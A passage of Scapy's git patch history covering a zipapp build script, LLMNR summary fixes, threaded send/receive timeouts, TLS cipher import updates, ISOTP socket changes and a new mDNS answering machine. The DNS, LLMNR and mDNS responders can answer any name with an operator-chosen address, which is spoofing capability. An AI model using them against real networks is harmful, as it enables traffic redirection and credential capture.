+DEST="./dist/scapy.pyz" +if [ ! -d "./dist" ]; then + mkdir dist +fi + +echo "$SCPY" +# Build the zipapp +echo "Building zipapp" +$PYTHON -m zipapp \ + -o "$DEST" \ + -p "/usr/bin/env python3" \ + -m "scapy.main:interact" \ + -c \ + "$SCPY" + +# Cleanup +rm -rf "$TMPFLD" diff --git a/pyproject.toml b/pyproject.toml index b0637e583f2..32993eb7fbd 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -66,9 +66,6 @@ doc = [ # setuptools specific -[tool.setuptools] -zip-safe = false # We use __file__ in scapy/__init__.py, therefore Scapy isn't zip safe - [tool.setuptools.packages.find] include = [ "scapy*", @@ -90,7 +87,7 @@ omit = [ # Scapy tools "scapy/tools/", # Scapy external modules - "scapy/libs/six.py", - "scapy/libs/winpcapy.py", "scapy/libs/ethertypes.py", + "scapy/libs/manuf.py", + "scapy/libs/winpcapy.py", ] diff --git a/scapy/__init__.py b/scapy/__init__.py index eeb937cc9ca..e7fa1a489b3 100644 --- a/scapy/__init__.py +++ b/scapy/__init__.py @@ -144,7 +144,7 @@ def _version(): with open(version_file, 'r') as fdsec: tag = fdsec.read() return tag - except FileNotFoundError: + except (FileNotFoundError, NotADirectoryError): pass # Method 2: from the archive tag, exported when using git archives diff --git a/scapy/main.py b/scapy/main.py index 573bed8f538..0fdd4a1982a 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -422,10 +422,10 @@ def save_session(fname="", session=None, pickleProto=-1): log_interactive.info("Saving session into [%s]", fname) if not session: - try: + if conf.interactive_shell in ["ipython", "ptipython"]: from IPython import get_ipython session = get_ipython().user_ns - except Exception: + else: session = builtins.__dict__["scapy_session"] if not session: @@ -934,6 +934,7 @@ def ptpython_configure(repl): cfg.InteractiveShellEmbed.confirm_exit = False cfg.InteractiveShellEmbed.separate_in = u'' if int(IPython.__version__[0]) >= 6: + cfg.InteractiveShellEmbed.term_title = True cfg.InteractiveShellEmbed.term_title_format = ("Scapy %s" % conf.version) # As of IPython 6-7, the jedi completion module is a dumpster From 82c2ace49601ebf7c1fb44af498bcfb2df8671ab Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 12 May 2024 01:53:00 +0200 Subject: [PATCH 1275/1632] Update zipapp script --- .config/ci/zipapp.sh | 25 +++++++++++++++++++++---- 1 file changed, 21 insertions(+), 4 deletions(-) diff --git a/.config/ci/zipapp.sh b/.config/ci/zipapp.sh index 5f7497597b5..525facf396c 100644 --- a/.config/ci/zipapp.sh +++ b/.config/ci/zipapp.sh @@ -10,7 +10,13 @@ DIR=$(realpath "$(dirname "$0")/../../") cd $DIR if [ ! -e "pyproject.toml" ]; then - echo "zipapp.sh must be called from scapy root folder" + echo "zipapp.sh was not able to find scapy's root folder" + exit 1 +fi + +MODE="$1" +if [ -z "$MODE" ] || ( [ "$MODE" != "full" ] && [ "$MODE" != "simple" ] ); then + echo "Usage: zipapp.sh " exit 1 fi @@ -19,6 +25,9 @@ then PYTHON=${PYTHON:-python3} fi +# Get Scapy version +SCPY_VERSION=$(python3 -c "print(__import__('scapy').__version__)") + # Get temp directory TMPFLD="$(mktemp -d)" if [ -z "$TMPFLD" ] || [ ! -d "$TMPFLD" ]; then @@ -45,11 +54,17 @@ cd "$SCPY" && find . -not \( \ -wholename "./scapy*" -o \ -wholename "./pyproject.toml" -o \ -wholename "./LICENSE" \ -\) -print +\) -delete cd $DIR -# Get DEST file -DEST="./dist/scapy.pyz" +# Depending on the mode, install dependencies and get DEST file +if [ "$MODE" == "full" ]; then + $PYTHON -m pip install --target "$SCPY" IPython + DEST="./dist/scapy-full-$SCPY_VERSION.pyz" +else + DEST="./dist/scapy-$SCPY_VERSION.pyz" +fi + if [ ! -d "./dist" ]; then mkdir dist fi @@ -66,3 +81,5 @@ $PYTHON -m zipapp \ # Cleanup rm -rf "$TMPFLD" + +echo "Success. zipapp avaiable at $DEST" From 041f3ef57f5fa7a13a164b32e9a0d14d1311ae23 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 12 May 2024 22:40:58 +0300 Subject: [PATCH 1276/1632] [LLMNR] tolerate malformed queries/responses (#4381) when showing summaries. Now that the question and answer sections are PacketListFields they can contain Raw instances without the qname/rrname attributes. This patch prevents `mysummary` from throwing the AttributeError exception when it encounters queries/responses like that. It's a follow-up to dda902e8. Fixes: ``` File "scapy/scapy/sendrecv.py", line 1439, in tshark sniff(prn=_cb, store=False, *args, **kargs) File "scapy/scapy/sendrecv.py", line 1311, in sniff sniffer._run(*args, **kwargs) File "scapy/scapy/sendrecv.py", line 1254, in _run session.on_packet_received(p) File "scapy/scapy/sessions.py", line 109, in on_packet_received result = self.prn(pkt) File "scapy/scapy/sendrecv.py", line 1436, in _cb print("%5d\t%s" % (i[0], pkt.summary())) File "scapy/scapy/packet.py", line 1650, in summary return self._do_summary()[1] File "scapy/scapy/packet.py", line 1624, in _do_summary found, s, needed = self.payload._do_summary() File "scapy/scapy/packet.py", line 1624, in _do_summary found, s, needed = self.payload._do_summary() File "scapy/scapy/packet.py", line 1624, in _do_summary found, s, needed = self.payload._do_summary() File "scapy/scapy/packet.py", line 1627, in _do_summary ret = self.mysummary() File "scapy/scapy/layers/llmnr.py", line 60, in mysummary self.qd[0].qname.decode(errors="backslashreplace"), File "scapy/scapy/packet.py", line 469, in __getattr__ return self.payload.__getattr__(attr) File "scapy/scapy/packet.py", line 467, in __getattr__ fld, v = self.getfield_and_val(attr) File "scapy/scapy/packet.py", line 1793, in getfield_and_val raise AttributeError(attr) AttributeError: qname. Did you mean: '_name'? ``` --- scapy/layers/llmnr.py | 25 +++++++++++++++++-------- test/scapy/layers/llmnr.uts | 14 ++++++++++++++ 2 files changed, 31 insertions(+), 8 deletions(-) diff --git a/scapy/layers/llmnr.py b/scapy/layers/llmnr.py index fef6a97c58a..9872e4171b4 100644 --- a/scapy/layers/llmnr.py +++ b/scapy/layers/llmnr.py @@ -28,6 +28,8 @@ DNSCompressedPacket, DNS_am, DNS, + DNSQR, + DNSRR, ) @@ -57,15 +59,22 @@ def hashret(self): return struct.pack("!H", self.id) def mysummary(self): - if self.an: - return "LLMNRResponse '%s' is at '%s'" % ( - self.an[0].rrname.decode(errors="backslashreplace"), - self.an[0].rdata, - ), [UDP] - if self.qd: - return "LLMNRQuery who has '%s'" % ( + s = self.__class__.__name__ + if self.qr: + if self.an and isinstance(self.an[0], DNSRR): + s += " '%s' is at '%s'" % ( + self.an[0].rrname.decode(errors="backslashreplace"), + self.an[0].rdata, + ) + else: + s += " [malformed]" + elif self.qd and isinstance(self.qd[0], DNSQR): + s += " who has '%s'" % ( self.qd[0].qname.decode(errors="backslashreplace"), - ), [UDP] + ) + else: + s += " [malformed]" + return s, [UDP] class LLMNRResponse(LLMNRQuery): diff --git a/test/scapy/layers/llmnr.uts b/test/scapy/layers/llmnr.uts index 6eff7fc98fe..ef953c1a8df 100644 --- a/test/scapy/layers/llmnr.uts +++ b/test/scapy/layers/llmnr.uts @@ -42,8 +42,22 @@ assert b.answers(a) assert not a.answers(b) = Summary +q = LLMNRQuery(b'\xd5\xd5\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07example\x00\x00\x01\x00\x01') +assert q.mysummary()[0] == r"LLMNRQuery who has 'example.'" + q = LLMNRQuery(b'Yy\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\xff\x00\x00\x01\x00\x01') assert q.mysummary()[0] == r"LLMNRQuery who has '\xff.'" +with no_debug_dissector(): + q = LLMNRQuery(b'@@\x00\x1b\xed7\x96J\x00\x00\x00\x01\x00\x00') + assert q.mysummary()[0] == r"LLMNRQuery [malformed]" + +r = LLMNRResponse(b'e\xcc\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00\x07example\x00\x00\x01\x00\x01\x07example\x00\x00\x01\x00\x01\x00\x00\x00\x1e\x00\x04\xc0\x00\x02\x01') +assert r.mysummary()[0] == r"LLMNRResponse 'example.' is at '192.0.2.1'" + r = LLMNRResponse(b'\n\xe6\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00\x01\xff\x00\x00\x1c\x00\x01\xc0\x0c\x00\x1c\x00\x01\x00\x00\x00\x1e\x00\x10\xfe\x80\x00\x00\x00\x00\x00\x00xu\x17\xff\xfe\xbc\xac\xcb') assert r.mysummary()[0] == r"LLMNRResponse '\xff.' is at 'fe80::7875:17ff:febc:accb'" + +with no_debug_dissector(): + r = LLMNRResponse(b'\xd3<\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00\x04H\x00\x00\x01\x00\x01\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x1e\x00\x04\xc0\xa88\x04') + assert r.mysummary()[0] == r"LLMNRResponse [malformed]" From ecfeb1427ff1878eb7e89a5daf3ce2de2f38ab55 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 12 May 2024 22:54:49 +0200 Subject: [PATCH 1277/1632] sndrcv threaded mode: fix timeout (#4387) --- scapy/layers/l2.py | 10 +++++-- scapy/sendrecv.py | 67 +++++++++++++++++++++++++++++++--------------- 2 files changed, 53 insertions(+), 24 deletions(-) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index e9e5d1d2746..427b11d3592 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -1002,8 +1002,13 @@ def show(self, *args, **kwargs): @conf.commands.register -def arping(net, timeout=2, cache=0, verbose=None, **kargs): - # type: (str, int, int, Optional[int], **Any) -> Tuple[ARPingResult, PacketList] # noqa: E501 +def arping(net: str, + timeout: int = 2, + cache: int = 0, + verbose: Optional[int] = None, + threaded: bool = True, + **kargs: Any, + ) -> Tuple[ARPingResult, PacketList]: """ Send ARP who-has requests to determine which hosts are up:: @@ -1028,6 +1033,7 @@ def arping(net, timeout=2, cache=0, verbose=None, **kargs): verbose=verbose, filter="arp and arp[7] = 2", timeout=timeout, + threaded=threaded, iface_hint=net, **kargs, ) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index c83a612777d..437241c4d9b 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -90,7 +90,8 @@ class debug: :param prebuild: pre-build the packets before starting to send them. Automatically enabled when a generator is passed as the packet :param _flood: - :param threaded: if True, packets will be sent in an individual thread + :param threaded: if True, packets are sent in a thread and received in another. + defaults to False. :param session: a flow decoder used to handle stream of packets :param chainEX: if True, exceptions during send will be forwarded :param stop_filter: Python function applied to each packet to determine if @@ -109,9 +110,8 @@ class SndRcvHandler(object): This matches the requests and answers. Notes:: - - threaded mode: enabling threaded mode will likely - break packet timestamps, but might result in a speedup - when sending a big amount of packets. Disabled by default + - threaded: if you're planning to send/receive many packets, it's likely + a good idea to use threaded mode. - DEVS: store the outgoing timestamp right BEFORE sending the packet to avoid races that could result in negative latency. We aren't Stadia """ @@ -156,6 +156,8 @@ def __init__(self, self.notans = 0 self.noans = 0 self._flood = _flood + self.threaded = threaded + self.breakout = False # Instantiate packet holders if prebuild and not self._flood: self.tobesent = list(pkt) # type: _PacketIterable @@ -175,22 +177,35 @@ def __init__(self, if threaded or self._flood: # Send packets in thread. - # https://github.com/secdev/scapy/issues/1791 snd_thread = Thread( target=self._sndrcv_snd ) snd_thread.daemon = True # Start routine with callback - self._sndrcv_rcv(snd_thread.start) + interrupted = None + try: + self._sndrcv_rcv(snd_thread.start) + except KeyboardInterrupt as ex: + interrupted = ex + + self.breakout = True # Ended. Let's close gracefully if self._flood: # Flood: stop send thread self._flood.stop() snd_thread.join() + + if interrupted and self.chainCC: + raise interrupted else: - self._sndrcv_rcv(self._sndrcv_snd) + # Send packets, then receive. + try: + self._sndrcv_rcv(self._sndrcv_snd) + except KeyboardInterrupt: + if self.chainCC: + raise if multi: remain = [ @@ -252,6 +267,8 @@ def _sndrcv_snd(self): self.pks.send(p) if self.inter: time.sleep(self.inter) + if self.breakout: + break i += 1 if self.verbose: print("Finished sending %i packets." % i) @@ -273,6 +290,15 @@ def _sndrcv_snd(self): elif not self._send_done: self.notans = i self._send_done = True + # In threaded mode, timeout. + if self.threaded and self.timeout is not None and not self.breakout: + t = time.monotonic() + self.timeout + while time.monotonic() < t: + if self.breakout: + break + time.sleep(0.1) + if self.sniffer and self.sniffer.running: + self.sniffer.stop() def _process_packet(self, r): # type: (Packet) -> None @@ -310,22 +336,19 @@ def _process_packet(self, r): def _sndrcv_rcv(self, callback): # type: (Callable[[], None]) -> None """Function used to receive packets and check their hashret""" + # This is blocking. self.sniffer = None # type: Optional[AsyncSniffer] - try: - self.sniffer = AsyncSniffer() - self.sniffer._run( - prn=self._process_packet, - timeout=self.timeout, - store=False, - opened_socket=self.rcv_pks, - session=self.session, - stop_filter=self.stop_filter, - started_callback=callback, - chainCC=self.chainCC, - ) - except KeyboardInterrupt: - if self.chainCC: - raise + self.sniffer = AsyncSniffer() + self.sniffer._run( + prn=self._process_packet, + timeout=None if self.threaded else self.timeout, + store=False, + opened_socket=self.rcv_pks, + session=self.session, + stop_filter=self.stop_filter, + started_callback=callback, + chainCC=True, + ) def sndrcv(*args, **kwargs): From f17e8da65d9299d6dbc84b427aaf7761aff31355 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 12 May 2024 22:55:02 +0200 Subject: [PATCH 1278/1632] Fix cryptography > 43.0 deprecation warning in TLS (#4383) --- scapy/layers/tls/crypto/cipher_block.py | 25 +++++++++++++++++------- scapy/layers/tls/crypto/cipher_stream.py | 9 ++++++++- 2 files changed, 26 insertions(+), 8 deletions(-) diff --git a/scapy/layers/tls/crypto/cipher_block.py b/scapy/layers/tls/crypto/cipher_block.py index ee64fe1bbc0..cca1387c342 100644 --- a/scapy/layers/tls/crypto/cipher_block.py +++ b/scapy/layers/tls/crypto/cipher_block.py @@ -17,10 +17,21 @@ from cryptography.utils import ( CryptographyDeprecationWarning, ) - from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes, # noqa: E501 - BlockCipherAlgorithm, - CipherAlgorithm) + from cryptography.hazmat.primitives.ciphers import ( + BlockCipherAlgorithm, + Cipher, + CipherAlgorithm, + algorithms, + modes, + ) from cryptography.hazmat.backends.openssl.backend import backend + try: + # cryptography > 43.0 + from cryptography.hazmat.decrepit.ciphers import ( + algorithms as decrepit_algorithms, + ) + except ImportError: + decrepit_algorithms = algorithms _tls_block_cipher_algs = {} @@ -133,7 +144,7 @@ class Cipher_CAMELLIA_256_CBC(Cipher_CAMELLIA_128_CBC): if conf.crypto_valid: class Cipher_DES_CBC(_BlockCipher): - pc_cls = algorithms.TripleDES + pc_cls = decrepit_algorithms.TripleDES pc_cls_mode = modes.CBC block_size = 8 key_len = 8 @@ -151,7 +162,7 @@ class Cipher_DES40_CBC(Cipher_DES_CBC): key_len = 5 class Cipher_3DES_EDE_CBC(_BlockCipher): - pc_cls = algorithms.TripleDES + pc_cls = decrepit_algorithms.TripleDES pc_cls_mode = modes.CBC block_size = 8 key_len = 24 @@ -165,13 +176,13 @@ class Cipher_3DES_EDE_CBC(_BlockCipher): category=CryptographyDeprecationWarning) class Cipher_IDEA_CBC(_BlockCipher): - pc_cls = algorithms.IDEA + pc_cls = decrepit_algorithms.IDEA pc_cls_mode = modes.CBC block_size = 8 key_len = 16 class Cipher_SEED_CBC(_BlockCipher): - pc_cls = algorithms.SEED + pc_cls = decrepit_algorithms.SEED pc_cls_mode = modes.CBC block_size = 16 key_len = 16 diff --git a/scapy/layers/tls/crypto/cipher_stream.py b/scapy/layers/tls/crypto/cipher_stream.py index bbd6bbd07a5..5c95fadd13a 100644 --- a/scapy/layers/tls/crypto/cipher_stream.py +++ b/scapy/layers/tls/crypto/cipher_stream.py @@ -14,6 +14,13 @@ if conf.crypto_valid: from cryptography.hazmat.primitives.ciphers import Cipher, algorithms from cryptography.hazmat.backends import default_backend + try: + # cryptography > 43.0 + from cryptography.hazmat.decrepit.ciphers import ( + algorithms as decrepit_algorithms, + ) + except ImportError: + decrepit_algorithms = algorithms _tls_stream_cipher_algs = {} @@ -103,7 +110,7 @@ def snapshot(self): if conf.crypto_valid: class Cipher_RC4_128(_StreamCipher): - pc_cls = algorithms.ARC4 + pc_cls = decrepit_algorithms.ARC4 key_len = 16 class Cipher_RC4_40(Cipher_RC4_128): From b44f9a270b22122c82da6b3e520cd6c9ffdd1074 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 13 May 2024 14:53:22 +0200 Subject: [PATCH 1279/1632] Add mDNS daemon (#4385) --- doc/scapy/usage.rst | 9 +++++ scapy/layers/dns.py | 74 +++++++++++++++++++++++++++++++------ scapy/layers/llmnr.py | 10 +++++ test/answering_machines.uts | 37 +++++++++++++++++++ 4 files changed, 118 insertions(+), 12 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 67b3f02a05c..d22ee028028 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1449,6 +1449,15 @@ By default, ``dnsd`` uses a joker (IPv4 only): it answers to all unknown servers You can also use ``relay=True`` to replace the joker behavior with a forward to a server included in ``conf.nameservers``. +mDNS server +------------ + +See :class:`~scapy.layers.dns.mDNS_am`:: + + >>> mdnsd(iface="eth0", joker="192.168.1.1") + +Note that ``mdnsd`` extends the ``dnsd`` API. + LLMNR server ------------ diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 0a7a3b709cd..c19774299e5 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -1246,7 +1246,13 @@ def mysummary(self): type = "Qry" if self.qd and isinstance(self.qd[0], DNSQR): name = ' %s' % self.qd[0].qname - return 'DNS %s%s' % (type, name) + return "%sDNS %s%s" % ( + "m" + if isinstance(self.underlayer, UDP) and self.underlayer.dport == 5353 + else "", + type, + name, + ) def post_build(self, pkt, pay): if isinstance(self.underlayer, TCP) and self.length is None: @@ -1418,12 +1424,13 @@ def dyndns_del(nameserver, name, type="ALL", ttl=10): class DNS_am(AnsweringMachine): function_name = "dnsd" filter = "udp port 53" - cls = DNS # We also use this automaton for llmnrd + cls = DNS # We also use this automaton for llmnrd / mdnsd def parse_options(self, joker=None, match=None, srvmatch=None, joker6=False, + send_error=False, relay=False, from_ip=None, from_ip6=None, @@ -1438,6 +1445,8 @@ def parse_options(self, joker=None, set to False to disable, None to mirror the interface's IPv6. :param jokerarpa: answer for .in-addr.arpa PTR requests. (Default: None) :param relay: relay unresolved domains to conf.nameservers (Default: False). + :param send_error: send an error message when this server can't answer + (Default: False) :param match: a dictionary of {name: val} where name is a string representing a domain name (A, AAAA) and val is a tuple of 2 elements, each representing an IP or a list of IPs. If val is a single element, @@ -1449,7 +1458,7 @@ def parse_options(self, joker=None, :param src_ip: override the source IP :param src_ip6: - Example: + Example:: $ sudo iptables -I OUTPUT -p icmp --icmp-type 3/3 -j DROP >>> dnsd(match={"google.com": "1.1.1.1"}, joker="192.168.0.2", iface="eth0") @@ -1481,6 +1490,7 @@ def normk(k): self.joker = joker self.joker6 = joker6 self.jokerarpa = jokerarpa + self.send_error = send_error self.relay = relay if isinstance(from_ip, str): self.from_ip = Net(from_ip) @@ -1510,19 +1520,37 @@ def is_request(self, req): ) def make_reply(self, req): + mDNS = isinstance(self, mDNS_am) + llmnr = self.cls != DNS + # Build reply from the request resp = req.copy() if Ether in req: - resp[Ether].src, resp[Ether].dst = ( - None if req[Ether].dst == "ff:ff:ff:ff:ff:ff" else req[Ether].dst, - req[Ether].src, - ) + if mDNS: + resp[Ether].src, resp[Ether].dst = None, None + elif llmnr: + resp[Ether].src, resp[Ether].dst = None, req[Ether].src + else: + resp[Ether].src, resp[Ether].dst = ( + None if req[Ether].dst in "ff:ff:ff:ff:ff:ff" else req[Ether].dst, + req[Ether].src, + ) from scapy.layers.inet6 import IPv6 if IPv6 in req: resp[IPv6].underlayer.remove_payload() - resp /= IPv6(dst=req[IPv6].src, src=self.src_ip6 or req[IPv6].dst) + if mDNS: + resp /= IPv6(dst="ff02::fb", src=self.src_ip6) + elif llmnr: + resp /= IPv6(dst=req[IPv6].src, src=self.src_ip6) + else: + resp /= IPv6(dst=req[IPv6].src, src=self.src_ip6 or req[IPv6].dst) elif IP in req: resp[IP].underlayer.remove_payload() - resp /= IP(dst=req[IP].src, src=self.src_ip or req[IP].dst) + if mDNS: + resp /= IP(dst="224.0.0.251", src=self.src_ip) + elif llmnr: + resp /= IP(dst=req[IP].src, src=self.src_ip) + else: + resp /= IP(dst=req[IP].src, src=self.src_ip or req[IP].dst) else: warning("No IP or IPv6 layer in %s", req.command()) return @@ -1531,6 +1559,7 @@ def make_reply(self, req): except IndexError: warning("No UDP layer in %s", req.command(), exc_info=True) return + # Now process each query and store its answer in 'ans' ans = [] try: req = req[self.cls] @@ -1548,6 +1577,7 @@ def make_reply(self, req): warning("No qd attribute in %s", req.command(), exc_info=True) return for rq in queries: + # For each query if isinstance(rq, Raw): warning("Cannot parse qd element %s", rq.command(), exc_info=True) continue @@ -1626,8 +1656,28 @@ def make_reply(self, req): # No rq was actually answered, as none was valid. Discard. return # All rq were answered - resp /= self.cls(id=req.id, qr=1, qd=req.qd, an=ans) + if mDNS: + # in mDNS mode, don't repeat the question + resp /= self.cls(id=req.id, qr=1, qd=[], an=ans) + else: + resp /= self.cls(id=req.id, qr=1, qd=req.qd, an=ans) return resp # An error happened - resp /= self.cls(id=req.id, qr=1, qd=req.qd, rcode=3) - return resp + if self.send_error: + resp /= self.cls(id=req.id, qr=1, qd=req.qd, rcode=3) + return resp + + +class mDNS_am(DNS_am): + """ + mDNS answering machine. + + This has the same arguments as DNS_am. See help(DNS_am) + + Example:: + + >>> mdnsd(joker="192.168.0.2", iface="eth0") + >>> mdnsd(match={"TEST.local": "192.168.0.2"}) + """ + function_name = "mdnsd" + filter = "udp port 5353" diff --git a/scapy/layers/llmnr.py b/scapy/layers/llmnr.py index 9872e4171b4..1f3282879d5 100644 --- a/scapy/layers/llmnr.py +++ b/scapy/layers/llmnr.py @@ -110,6 +110,16 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): class LLMNR_am(DNS_am): + """ + LLMNR answering machine. + + This has the same arguments as DNS_am. See help(DNS_am) + + Example:: + + >>> llmnrd(joker="192.168.0.2", iface="eth0") + >>> llmnrd(match={"TEST": "192.168.0.2"}) + """ function_name = "llmnrd" filter = "udp port 5355" cls = LLMNRQuery diff --git a/test/answering_machines.uts b/test/answering_machines.uts index b1bcdfe2913..2434765b05d 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -126,6 +126,43 @@ assert DNS_am().make_reply( Ether()/IP()/UDP()/DNS(b'q\xa04\x00\x00\xa0\x01\x00\xf3\x00\x01\x04\x01y') ) is None += LLMNR_am +def check_LLMNR_am_am_reply(packet): + assert packet[Ether].src == get_if_hwaddr(conf.iface) + assert packet[Ether].dst == "aa:aa:aa:aa:aa:aa" + assert packet[IP].src == get_if_addr(conf.iface) + assert packet[IP].dst == "192.168.0.1" + assert packet[UDP].dport == 51938 + assert packet[UDP].sport == 5355 + assert LLMNRResponse in packet and packet[LLMNRResponse].ancount == 1 and packet[LLMNRResponse].qdcount == 1 + assert packet[LLMNRResponse].qd[0].qname == b"TEST." + assert packet[LLMNRResponse].an[0].rdata == "192.168.1.1" + assert packet[LLMNRResponse].an[0].rrname == b"TEST." + assert packet[LLMNRResponse].an[0].ttl == 10 + +test_am(LLMNR_am, + Ether(src="aa:aa:aa:aa:aa:aa", dst="01:00:5e:00:00:fc")/IP(src="192.168.0.1", dst="224.0.0.252")/UDP(dport=5355, sport=51938)/LLMNRQuery(qd=DNSQR(qname=b"TEST.", qtype="A")), + check_LLMNR_am_am_reply, + match={"TEST": "192.168.1.1"}) + += mDNS_am +def check_mDNS_am_reply(packet): + assert packet[Ether].src == get_if_hwaddr(conf.iface) + assert packet[Ether].dst == "01:00:5e:00:00:fb" + assert packet[IP].src == get_if_addr(conf.iface) + assert packet[IP].dst == "224.0.0.251" + assert packet[UDP].dport == 5353 + assert packet[UDP].sport == 5353 + assert DNS in packet and packet[DNS].ancount == 1 and packet[DNS].qdcount == 0 + assert packet[DNS].an[0].rdata == "192.168.1.1" + assert packet[DNS].an[0].rrname == b"TEST.local." + assert packet[DNS].an[0].ttl == 10 + +test_am(mDNS_am, + Ether(src="aa:aa:aa:aa:aa:aa", dst="01:00:5e:00:00:fb")/IP(src="192.168.0.1", dst="224.0.0.251")/UDP(dport=5353, sport=5353)/DNS(qd=DNSQR(qname=b"TEST.local.", qtype="A")), + check_mDNS_am_reply, + joker="192.168.1.1") + = DHCPv6_am - Basic Instantiaion ~ osx netaccess a = DHCPv6_am() From fa94fe303f74a2c2bcf324b35a1f31a6360ee5b4 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 14 May 2024 08:02:45 +0200 Subject: [PATCH 1280/1632] ISOTPNativeSocket improvements (#4363) --- scapy/contrib/isotp/isotp_native_socket.py | 73 +++++++++++++--------- scapy/contrib/isotp/isotp_soft_socket.py | 1 + scapy/supersocket.py | 35 ++++++++++- 3 files changed, 78 insertions(+), 31 deletions(-) diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index 127e91f6d0e..949d24bd75a 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -319,44 +319,59 @@ def __init__(self, raise Scapy_Exception("Provide a string or a CANSocket " "object as iface parameter") - self.iface = cast(str, iface) or conf.contribs['NativeCANSocket']['iface'] # noqa: E501 - self.can_socket = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, - CAN_ISOTP) - self.__set_option_flags(self.can_socket, - ext_address, - rx_ext_address, - listen_only, - padding, - frame_txtime) - + self.iface: str = cast(str, iface) or conf.contribs['NativeCANSocket']['iface'] # noqa: E501 + # store arguments internally self.tx_id = tx_id self.rx_id = rx_id self.ext_address = ext_address self.rx_ext_address = rx_ext_address - - self.can_socket.setsockopt(SOL_CAN_ISOTP, - CAN_ISOTP_RECV_FC, - self.__build_can_isotp_fc_options( - stmin=stmin, bs=bs)) - self.can_socket.setsockopt(SOL_CAN_ISOTP, - CAN_ISOTP_LL_OPTS, - self.__build_can_isotp_ll_options( - mtu=CAN_ISOTP_CANFD_MTU if fd - else CAN_ISOTP_DEFAULT_LL_MTU, - tx_dl=CAN_FD_ISOTP_DEFAULT_LL_TX_DL if fd - else CAN_ISOTP_DEFAULT_LL_TX_DL)) - self.can_socket.setsockopt( + self.bs = bs + self.stmin = stmin + self.padding = padding + self.listen_only = listen_only + self.frame_txtime = frame_txtime + self.fd = fd + if basecls is None: + log_isotp.warning('Provide a basecls ') + self.basecls = basecls + self._init_socket() + + def _init_socket(self) -> None: + can_socket = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, + CAN_ISOTP) + self.__set_option_flags(can_socket, + self.ext_address, + self.rx_ext_address, + self.listen_only, + self.padding, + self.frame_txtime) + + can_socket.setsockopt(SOL_CAN_ISOTP, + CAN_ISOTP_RECV_FC, + self.__build_can_isotp_fc_options( + stmin=self.stmin, bs=self.bs)) + can_socket.setsockopt(SOL_CAN_ISOTP, + CAN_ISOTP_LL_OPTS, + self.__build_can_isotp_ll_options( + mtu=CAN_ISOTP_CANFD_MTU if self.fd + else CAN_ISOTP_DEFAULT_LL_MTU, + tx_dl=CAN_FD_ISOTP_DEFAULT_LL_TX_DL if self.fd + else CAN_ISOTP_DEFAULT_LL_TX_DL)) + can_socket.setsockopt( socket.SOL_SOCKET, SO_TIMESTAMPNS, 1 ) - self.__bind_socket(self.can_socket, self.iface, tx_id, rx_id) - self.ins = self.can_socket - self.outs = self.can_socket - if basecls is None: - log_isotp.warning('Provide a basecls ') - self.basecls = basecls + self.__bind_socket(can_socket, self.iface, self.tx_id, self.rx_id) + # make sure existing sockets are closed, + # required in case of a reconnect. + self.closed = False + self.close() + + self.ins = can_socket + self.outs = can_socket + self.closed = False def recv_raw(self, x=0xffff): # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 119917e5f44..81c6d3fe874 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -39,6 +39,7 @@ Callable, TYPE_CHECKING, ) + if TYPE_CHECKING: from scapy.contrib.cansocket import CANSocket diff --git a/scapy/supersocket.py b/scapy/supersocket.py index ca3aebf2f41..1f967044cb6 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -102,6 +102,11 @@ def __init__(self, def send(self, x): # type: (Packet) -> int + """Sends a `Packet` object + + :param x: `Packet` to be send + :return: Number of bytes that have been sent + """ sx = raw(x) try: x.sent_time = time.time() @@ -116,7 +121,12 @@ def send(self, x): if WINDOWS: def _recv_raw(self, sock, x): # type: (socket.socket, int) -> Tuple[bytes, Any, Optional[float]] - """Internal function to receive a Packet""" + """Internal function to receive a Packet. + + :param sock: Socket object from which data are received + :param x: Number of bytes to be received + :return: Received bytes, address information and no timestamp + """ pkt, sa_ll = sock.recvfrom(x) return pkt, sa_ll, None else: @@ -124,6 +134,10 @@ def _recv_raw(self, sock, x): # type: (socket.socket, int) -> Tuple[bytes, Any, Optional[float]] """Internal function to receive a Packet, and process ancillary data. + + :param sock: Socket object from which data are received + :param x: Number of bytes to be received + :return: Received bytes, address information and an optional timestamp """ timestamp = None if not self.auxdata_available: @@ -172,11 +186,22 @@ def _recv_raw(self, sock, x): def recv_raw(self, x=MTU): # 